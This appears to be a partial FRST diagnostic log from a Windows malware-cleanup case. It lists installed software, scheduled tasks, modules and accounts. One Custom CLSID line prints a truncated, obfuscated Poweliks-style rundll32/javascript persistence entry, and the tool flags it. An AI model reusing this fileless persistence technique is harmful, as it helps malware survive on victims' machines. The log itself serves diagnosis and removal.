Microsoft SQL Server Compact 3.5 SP2 x64 ENU (HKLM\...\{F39076D7-7168-44CD-A2C6-EBC1CDA7DC1C}) (Version: 3.5.8082.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Mozilla Firefox 33.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.0.2 (x86 en-US)) (Version: 33.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 33.0.2 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
National Instruments Software (HKLM-x32\...\NI Uninstaller) (Version: - National Instruments)
NI .NET Framework 4.0 (x32 Version: 4.01.49152 - National Instruments) Hidden
NI ActiveX Container (64-bit) (Version: 12.1.3.0 - National Instruments) Hidden
NI ActiveX Container (x32 Version: 12.1.3.0 - National Instruments) Hidden
NI Assistant Framework (x32 Version: 8.0.112.0 - National Instruments) Hidden
NI Assistant Framework 64-bit (Version: 8.0.120.0 - National Instruments) Hidden
NI Assistant Framework LabVIEW Code Generator 2012 (x32 Version: 8.0.70.0 - National Instruments) Hidden
NI Authentication 12.5.0 (64-bit) (Version: 12.5.199.0 - National Instruments) Hidden
NI Authentication 12.5.0 (x32 Version: 12.5.199.0 - National Instruments) Hidden
NI CodeSignAPI (x32 Version: 2.70.346 - National Instruments) Hidden
NI Curl 12.5.0 (64-bit) (Version: 12.5.197.0 - National Instruments) Hidden
NI Curl 12.5.0 (x32 Version: 12.5.197.0 - National Instruments) Hidden
NI Customer Experience Improvement Program (x32 Version: 1.1.21.0 - National Instruments) Hidden
NI DataSocket 5.0 (64-bit) (Version: 5.0.115.0 - National Instruments) Hidden
NI DataSocket 5.0 (x32 Version: 5.0.115.0 - National Instruments) Hidden
NI Distributed System Manager 2012 (x32 Version: 12.1.52.0 - National Instruments) Hidden
NI DN 2.0 SP1 installer (x32 Version: 2.11.49152 - National Instruments) Hidden
NI Error Reporting 2012 (x32 Version: 12.1.54.0 - National Instruments) Hidden
NI EulaDepot (x32 Version: 3.30.274 - National Instruments) Hidden
NI Example Finder 12.0 (x32 Version: 12.0.291.0 - National Instruments) Hidden
NI GMP Windows 32-bit Installer 12.0.0 (x32 Version: 12.0.46.0 - National Instruments) Hidden
NI GMP Windows 64-bit Installer 12.0.0 (Version: 12.0.46.0 - National Instruments) Hidden
NI Help Assistant 2.0 (64bit) (Version: 2.0.3 - National Instruments) Hidden
NI Help Assistant 2.0 (x32 Version: 2.0.3 - National Instruments) Hidden
NI Instrument IO Assistant for LabVIEW 2012 32-bit (x32 Version: 1.0.24.0 - National Instruments) Hidden
NI LabVIEW 2011 Real-Time NBFifo (x32 Version: 11.0.250.0 - National Instruments) Hidden
NI LabVIEW 2012 Help (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW 2012 Help File (x32 Version: 12.1.48.0 - National Instruments) Hidden
NI LabVIEW 2012 Manuals (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW 2012 Real-Time Error Dialog (x32 Version: 12.0.71.0 - National Instruments) Hidden
NI LabVIEW 2012 Real-Time NBFifo (x32 Version: 12.0.219.0 - National Instruments) Hidden
NI LabVIEW 2012 Run-Time Engine Web Server (x32 Version: 12.5.198.0 - National Instruments) Hidden
NI LabVIEW 2012 Scripting Code Generator (x32 Version: 8.0.247.0 - National Instruments) Hidden
NI LabVIEW 2012 Search (x32 Version: 12.0.4.0 - National Instruments) Hidden
NI LabVIEW 2012 Simulation (x32 Version: 12.0.359.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 (32-bit) (x32 Version: 12.1.104.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 (32-bit) (x32 Version: 12.1.53.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Deployable License (x32 Version: 12.1.52.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Deployment Framework (x32 Version: 12.0.463.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 f5 (x32 Version: 12.1.65.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 License (x32 Version: 12.1.52.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 MeasAppChm File (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Module for LEGO® MINDSTORMS® (x32 Version: 12.1.310 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Run-Time Engine Non-English Support. (x32 Version: 12.1.52.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Variable Web Service (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Web Server (x32 Version: 12.5.198.0 - National Instruments) Hidden
NI LabVIEW Broker (64 bit) (Version: 6.8.10.0 - National Instruments) Hidden
NI LabVIEW Broker (x32 Version: 6.8.10.0 - National Instruments) Hidden
NI LabVIEW C Interface (x32 Version: 1.0.1 - National Instruments) Hidden
NI LabVIEW Compare Utility 12.0.0 (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW for LEGO MINDSTORMS Mode (x32 Version: 12.1.18.0 - National Instruments) Hidden
NI LabVIEW MAX XML (x32 Version: 9.0.6.0 - National Instruments) Hidden
NI LabVIEW Merge Utility 2012 SP1 (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW Run-Time Engine 2011 SP1 (x32 Version: 11.0.448.0 - National Instruments) Hidden
NI LabVIEW Run-Time Engine 2012 SP1 f5 (x32 Version: 12.1.64.0 - National Instruments) Hidden
NI LabVIEW Run-Time Engine Interop 2011 (x32 Version: 11.0.449.0 - National Instruments) Hidden
NI LabVIEW Run-Time Engine Interop 2012 SP1 (x32 Version: 12.1.64.0 - National Instruments) Hidden
NI LabVIEW Toolkit for MINDSTORMS® Competitions 2014-2015 (x32 Version: 14.0.25 - National Instruments) Hidden
NI LabVIEW Web Server for Run-Time Engine (x32 Version: 11.0.375.0 - National Instruments) Hidden
NI LabVIEW Web Services Runtime (x32 Version: 12.5.128.0 - National Instruments) Hidden
NI LabWindows/CVI 2010 LabVIEW DLL Builder (x32 Version: 10.0.0360 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Analysis Library (64-bit) (Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Analysis Library (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Code Generator (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Low-Level Driver (Original) (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Low-Level Driver (Updated) (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Network Variable Library (64-bit) (Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Network Variable Library (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Run-Time Engine (64-bit) (Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 TDM Streaming Library (64-bit) (Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 TDM Streaming Library (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI Run-Time Engine 2010 SP1 (Updated) (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI Run-Time Engine 2010 SP1 (x32 Version: 10.0.1434 - National Instruments) Hidden
NI Launcher (x32 Version: 3.11.177 - National Instruments) Hidden
NI License Manager (x32 Version: 3.7.50 - National Instruments) Hidden
NI Logos 5.4 (64-bit) (Version: 5.4.350.0 - National Instruments) Hidden
NI Logos 5.4 (x32 Version: 5.4.350.0 - National Instruments) Hidden
NI Logos LabVIEW 2012 Support (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI Logos XT Support (x32 Version: 5.4.342.0 - National Instruments) Hidden
NI Logos64 XT Support (Version: 5.4.342.0 - National Instruments) Hidden
NI Math Kernel Libraries (64-bit) (Version: 1.0.10.0 - National Instruments) Hidden
NI Math Kernel Libraries (x32 Version: 1.0.10.0 - National Instruments) Hidden
NI MAX Remote Configuration 64-bit Installer 5.4 (Version: 5.40.49152 - National Instruments) Hidden
NI MAX Remote Configuration Installer 5.4 (x32 Version: 5.40.49152 - National Instruments) Hidden
NI MAX Support for 64 Bit Windows (Version: 5.40.49152 - National Instruments) Hidden
NI MDF Support (x32 Version: 3.30.274 - National Instruments) Hidden
NI mDNS Responder 2.1.1 (x32 Version: 2.11.49152 - National Instruments) Hidden
NI mDNS Responder 2.1.1 for Windows 64-bit (Version: 2.11.49152 - National Instruments) Hidden
NI Measurement & Automation Explorer 5.4.0 (x32 Version: 5.40.49152 - National Instruments) Hidden
NI Measurement Studio ComponentWorks 3D Graph (x32 Version: 8.6.10603 - National Instruments) Hidden
NI Measurement Studio Recipe Processor (x32 Version: 8.0.0101 - National Instruments) Hidden
NI MetaSuite Installer (x32 Version: 3.11.171 - National Instruments) Hidden
NI MXS 5.4.0 (x32 Version: 5.40.49152 - National Instruments) Hidden
NI MXS 5.4.0 for 64 Bit Windows (Version: 5.40.49152 - National Instruments) Hidden
NI Network Discovery 5.4 (x32 Version: 5.40.49152 - National Instruments) Hidden
NI Network Discovery 5.4 for Windows 64-bit (Version: 5.40.49152 - National Instruments) Hidden
NI NI LabVIEW 2011 SP1 Run-Time Engine Non-English Support (x32 Version: 11.0.302.0 - National Instruments) Hidden
NI OPC Support (x32 Version: 12.0.295.0 - National Instruments) Hidden
NI Portable Configuration 5.3.0 (x32 Version: 5.30.49152 - National Instruments) Hidden
NI Portable Configuration for 64 Bit Windows 5.3.0 (Version: 5.30.49152 - National Instruments) Hidden
NI Registration Wizard (x32 Version: 1.3.94.0 - National Instruments) Hidden
NI Remote Provider for MAX 5.4.0 (x32 Version: 5.40.49152 - National Instruments) Hidden
NI Remote PXI Provider for MAX 5.3.0 (x32 Version: 5.30.49152 - National Instruments) Hidden
NI Search Shared (x32 Version: 12.0.5.0 - National Instruments) Hidden
NI Security Update (KB 67L8LCQW) (64-bit) (Version: 1.0.29.0 - National Instruments) Hidden
NI Security Update (KB 67L8LCQW) (x32 Version: 1.0.29.0 - National Instruments) Hidden
NI Security Update (KB67L8LIQW) (x32 Version: 8.6.10500 - National Instruments) Hidden
NI SLCP 1.0 (x32 Version: 1.0.63.0 - National Instruments) Hidden
NI Software Provider for MAX 5.3.0 (x32 Version: 5.30.49152 - National Instruments) Hidden
NI SSL LabVIEW 2012 SP1 Support (x32 Version: 12.5.198.0 - National Instruments) Hidden
NI SSL LabVIEW RTE 2012 SP1 Support (x32 Version: 12.5.8.0 - National Instruments) Hidden
NI SSL Support (64-bit) (Version: 12.5.199.0 - National Instruments) Hidden
NI SSL Support (x32 Version: 12.5.199.0 - National Instruments) Hidden
NI System API Client for WIF 5.4.0 (x32 Version: 5.40.215.0 - National Instruments) Hidden
NI System API Web-Servce 32-bit 5.4.0 (x32 Version: 5.40.236.0 - National Instruments) Hidden
NI System API Windows 32-bit 5.4.0 (x32 Version: 5.40.220.0 - National Instruments) Hidden
NI System API Windows 64-bit 5.4.0 (Version: 5.40.220.0 - National Instruments) Hidden
NI System Configuration 5.4.0 LabVIEW Support (x32 Version: 5.40.79.0 - National Instruments) Hidden
NI System Configuration LV2012 Support 5.4.0 (x32 Version: 5.40.76.0 - National Instruments) Hidden
NI System Configuration Runtime 5.4.0 (x32 Version: 5.40.108.0 - National Instruments) Hidden
NI System Configuration Runtime 5.4.0 for Windows 64-bit (Version: 5.40.108.0 - National Instruments) Hidden
NI System State Publisher (64-bit) (Version: 12.1.46.0 - National Instruments) Hidden
NI System State Publisher (x32 Version: 12.0.446.0 - National Instruments) Hidden
NI System Web Server 12.0 (x32 Version: 12.5.199.0 - National Instruments) Hidden
NI System Web Server Base 12.5.0 (64-bit) (Version: 12.5.198.0 - National Instruments) Hidden
NI System Web Server Base 12.5.0 (x32 Version: 12.5.198.0 - National Instruments) Hidden
NI TDM Excel Add-In 3.4 (x32 Version: 3.4.19.0 - National Instruments) Hidden
NI TDM Excel Add-In 3.4 64-bit (Version: 3.4.19.0 - National Instruments) Hidden
NI TDM Streaming 2.4 (64-bit) (Version: 2.4.55.0 - National Instruments) Hidden
NI TDM Streaming 2.4 (x32 Version: 2.4.55.0 - National Instruments) Hidden
NI Trace Engine (64-bit) (Version: 12.0.401.0 - National Instruments) Hidden
NI Trace Engine (x32 Version: 12.0.401.0 - National Instruments) Hidden
NI Uninstaller (x32 Version: 3.30.274 - National Instruments) Hidden
NI Update Service 2.2.5 (x32 Version: 2.25.79 - National Instruments) Hidden
NI USI 2.0.0 (x32 Version: 2.0.04901 - National Instruments) Hidden
NI USI 2.0.0 64-Bit (Version: 2.0.04901 - National Instruments) Hidden
NI Variable Engine (64-bit) (Version: 2.6.296.0 - National Instruments) Hidden
NI Variable Engine 2.6.0 (x32 Version: 2.6.296.0 - National Instruments) Hidden
NI Variable Engine LabVIEW 2012 Support (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI VC2005MSMs x64 (Version: 8.05.0 - National Instruments) Hidden
NI VC2005MSMs x86 (x32 Version: 8.05.0 - National Instruments) Hidden
NI VC2008MSMs x64 (Version: 9.0.401 - National Instruments) Hidden
NI VC2008MSMs x86 (x32 Version: 9.0.401 - National Instruments) Hidden
NI VC2010SP1MSMs x64 (Version: 10.0.100 - National Instruments) Hidden
NI VC2010SP1MSMs x86 (x32 Version: 10.0.100 - National Instruments) Hidden
NI VIPM Helper 2012 (x32 Version: 12.0.211.0 - National Instruments) Hidden
NI Web Application Server 12.0 (64-bit) (Version: 12.5.198.0 - National Instruments) Hidden
NI Web Application Server 12.0 (x32 Version: 12.5.198.0 - National Instruments) Hidden
NI Web Interface Framework 2012 (x32 Version: 12.5.138.0 - National Instruments) Hidden
NI Web Pipeline 2.0.1 (x32 Version: 2.0.128.0 - National Instruments) Hidden
NI Web Pipeline 2.0.1 64-bit support (Version: 2.0.122.0 - National Instruments) Hidden
NI Xalan Delay Load 1.10.2 (x32 Version: 1.10.72.0 - National Instruments) Hidden
NI Xalan Delay Load 1.10.2 64-bit (Version: 1.10.73.0 - National Instruments) Hidden
NI Xerces Delay Load 2.7.3 (x32 Version: 2.7.180.0 - National Instruments) Hidden
NI Xerces Delay Load 2.7.3 64-bit (Version: 2.7.190.0 - National Instruments) Hidden
NI-DAQmx/LabVIEW shared documentation 9.5.5 (x32 Version: 9.55.49152 - National Instruments) Hidden
NI-DAQmx/LabVIEW shared documentation for 64 Bit Windows 9.5.5 (Version: 9.55.49152 - National Instruments) Hidden
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.7.0 - Nikon)
NI-Mesa (Version: 11.0.11.0 - National Instruments) Hidden
NI-Mesa (x32 Version: 11.0.11.0 - National Instruments) Hidden
NI-RPC 4.3.0f0 (x32 Version: 4.30.49152 - National Instruments) Hidden
NI-RPC 4.3.0f0 for 64 Bit Windows (Version: 4.30.49152 - National Instruments) Hidden
NI-RPC 4.3.0f0 for Phar Lap ETS (x32 Version: 4.30.49152 - National Instruments) Hidden
NVIDIA Graphics Driver 327.62 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 327.62 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.26.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.26.4 - NVIDIA Corporation)
NVIDIA nView 140.75 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NView) (Version: 140.75 - NVIDIA Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4659.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4659.1001 - Microsoft Corporation) Hidden
Open XML SDK 2.0 for Microsoft Office (HKLM-x32\...\{171D8D76-3F05-455A-A8AF-C561C2679905}) (Version: 2.0.5022 - Microsoft Corporation)
PBA Driver (Version: 1.0.1.7 - Dell Inc.) Hidden
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.4.11 - Nikon)
Preboot Manager (Version: 03.05.00.026 - Wave Systems Corp.) Hidden
Private Information Manager (Version: 07.03.00.016 - Wave Systems Corp.) Hidden
RDp version 12.10.0 (HKLM-x32\...\{F2151451-7715-4671-9044-3B9EE0AA4D7D}_is1) (Version: 12.10.0 - JacobLis.com)
Readiris Pro 10 (HKLM-x32\...\{14D08502-FEE4-40E5-90D3-8A967A1D8BA2}) (Version: - )
Reset NI Config 5.0.0 (x32 Version: 5.0.146.0 - National Instruments) Hidden
SI TSS (Version: 2.1.41 - Security Innovation) Hidden
SmarThru 4 (HKLM-x32\...\{90F1943D-EA4A-4460-B59F-30023F3BA69A}) (Version: - )
SmarThru PC Fax (HKLM-x32\...\SmarThru PC Fax) (Version: - )
SolidWorks Enterprise PDM (HKLM\...\{96E13B88-4AC5-40CD-8435-8C2BD057C001}) (Version: 14.02.0714 - SolidWorks Corporation)
SPBA (WBF) 5.9 (Version: 5.9.7.7232 - Authentec Inc.) Hidden
ST Microelectronics 3 Axis Digital Accelerometer Solution (HKLM-x32\...\{9C24F411-9CA7-4A8A-91F3-F08A4A38EB31}) (Version: 4.10.0030 - ST Microelectronics)
TeamViewer 6 Host (HKLM-x32\...\TeamViewer 6 Host) (Version: 6.0.10722 - TeamViewer GmbH)
Time Clock version 12.11.0 (HKLM-x32\...\{8B4F8277-D2D7-44F1-B5DF-F4F5C87CABF6}_is1) (Version: 12.11.0 - Jacob Liscom)
toolkit32for64bit (x32 Version: 7.68.85.0013 - Wave Systems Corp) Hidden
Trusted Drive Manager (Version: 5.0.0.304 - Wave Systems Corp.) Hidden
UFR II Printer Driver Uninstaller (HKLM\...\Canon UFR II Printer Driver) (Version: 6, 1, 0, 0 - Canon Inc.)
Update Rollup 6 for Microsoft Dynamics CRM for Outlook (KB2600640) (HKLM-x32\...\KB2600640_Client_1033) (Version: 5.0.9690.1992 - Microsoft Corporation)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.7.4 - Nikon)
Wave Crypto Runtime 2.0.9.0 x64 (Version: 02.00.09.0000 - Wave Systems Corp) Hidden
Wave Crypto Runtime 2.0.9.0 x86 (x32 Version: 02.00.09.0000 - Wave Systems Corp) Hidden
Wave Infrastructure Installer (Version: 07.68.85.0014 - Wave Systems Corp) Hidden
Wave Support Software Installer (Version: 05.15.00.021 - Wave Systems Corp) Hidden
WebEx Productivity Tools (HKLM-x32\...\{A19738DD-B398-415F-8A61-40C724A6A73A}) (Version: 2.1.1400 - Cisco WebEx LLC)
WIF Core Dependencies Windows 5.4.0 (x32 Version: 5.40.69.0 - National Instruments) Hidden
Windows Driver Package - Leapfrog (Leapfrog-USBLAN) Net (09/10/2009 02.03.05.012) (HKLM\...\8F14F2ECEDE68D26EA515B48DC25B39103C4FE8D) (Version: 09/10/2009 02.03.05.012 - Leapfrog)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinRAR 5.20 beta 2 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.20.2 - win.rar GmbH)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1619941995-4271792153-444280415-1167_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points =========================

31-10-2014 21:31:22 Windows Update
03-11-2014 20:03:36 Windows Update
03-11-2014 20:04:07 Windows Update
03-11-2014 20:05:33 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2014-11-03 14:48 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0A562D10-42B3-4B37-8DD8-F826ADD2CD0F} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1245 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1245" "$(Arg0)"
Task: {1BF18B5B-38B8-4F14-A944-1C521D9431B4} - System32\Tasks\Microsoft Office 15 Sync Maintenance for {3cb986d6-91c6-4e57-9f69-11185dadd832} ADC69.adc.com => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-09-16] (Microsoft Corporation)
Task: {26F13908-B242-4EDE-8244-B202FC3A196E} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1265 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1265" "$(Arg0)"
Task: {2F223DDA-408A-4FF7-B091-A4F4BC686A23} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1003 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1003" "$(Arg0)"
Task: {34413358-051F-42CA-BB6F-0B7E492A084C} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1000 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1000" "$(Arg0)"
Task: {39129A2A-0E8E-4DEE-AFD2-C2C396CC5558} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1429 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1429" "$(Arg0)"
Task: {6401F1FD-7EE1-4874-8C33-2A32FD019610} - System32\Tasks\WSCEAA => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\RemoteManagement\WSCEAA.exe [2012-10-17] (Wave Systems Corp.)
Task: {7C98D515-88D0-48B0-9BBC-571271F39C98} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1244 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1244" "$(Arg0)"
Task: {937498CF-F3C6-42F0-95A3-2C0FEBB7B492} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {952F0C0C-CAE5-4A9F-8511-841E2A5C5E14} - System32\Tasks\NIUpdateServiceCheckTask => C:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe [2012-11-16] (National Instruments)
Task: {A4AC7ECA-B910-42F4-BA10-263A0104BFA0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {AD332114-26E0-4546-8872-302B310DA61C} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1246 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1246" "$(Arg0)"
Task: {BA0DEFBB-D99E-4EA3-A5EF-A85921CBC8AE} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1247 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1247" "$(Arg0)"
Task: {C6D0C48E-F99E-4C1A-9747-9225A41CD745} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-09-25] (Microsoft Corporation)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Defrag.job => C:\Windows\system32\Defrag.exe

==================== Loaded Modules (whitelisted) =============

2010-01-20 06:49 - 2010-01-20 06:49 - 00027648 _____ () C:\Windows\System32\sdo2ml6.dll
2013-01-24 11:07 - 2013-01-24 11:07 - 00824832 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\sdo2mdu.dll
2014-06-03 08:34 - 2014-05-20 08:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2012-11-20 07:52 - 2012-11-20 07:52 - 00225720 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
2012-11-20 07:51 - 2012-11-20 07:51 - 00038840 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\DeviceStatus.dll
2012-11-23 17:34 - 2012-11-23 17:34 - 00020480 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe
2013-02-20 17:07 - 2013-10-28 18:38 - 00097568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-10-21 09:33 - 2014-09-09 09:59 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2014-01-15 09:33 - 2014-01-15 09:33 - 00293376 _____ () C:\Windows\system32\CHookExt.dll
2013-02-20 16:56 - 2012-02-01 16:34 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2013-01-28 12:08 - 2013-01-28 12:08 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2013-01-28 12:08 - 2013-01-28 12:08 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2013-09-10 09:26 - 2013-09-10 09:26 - 02214912 _____ () C:\Program Files (x86)\National Instruments\Shared\LabVIEW Run-Time\2012\NIQtCore_2012.dll
2013-09-10 09:26 - 2013-09-10 09:26 - 08044544 _____ () C:\Program Files (x86)\National Instruments\Shared\LabVIEW Run-Time\2012\NIQtGui_2012.dll
2012-01-26 08:36 - 2012-01-26 08:36 - 00278528 ____R () C:\Program Files (x86)\National Instruments\Shared\License Manager\Bin\xerces-depdom_2_6.dll
2013-05-29 11:36 - 2013-05-29 11:36 - 01958560 _____ () C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\niwsrp.dll
2014-09-24 22:12 - 2014-09-24 22:12 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll
2013-09-11 00:34 - 2014-10-27 21:01 - 03649648 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Audible Download Manager.lnk => C:\Windows\pss\Audible Download Manager.lnk.CommonStartup
MSCONFIG\startupreg: 1135n Scan2PC => "C:\Windows\twain_32\Dell\Dell1135\Scan2Pc.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: TdmNotify => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe

========================= Accounts: ==========================

Administrator (S-1-5-21-2032665127-3746338806-4175205368-500 - Administrator - Disabled)
Guest (S-1-5-21-2032665127-3746338806-4175205368-501 - Limited - Disabled)
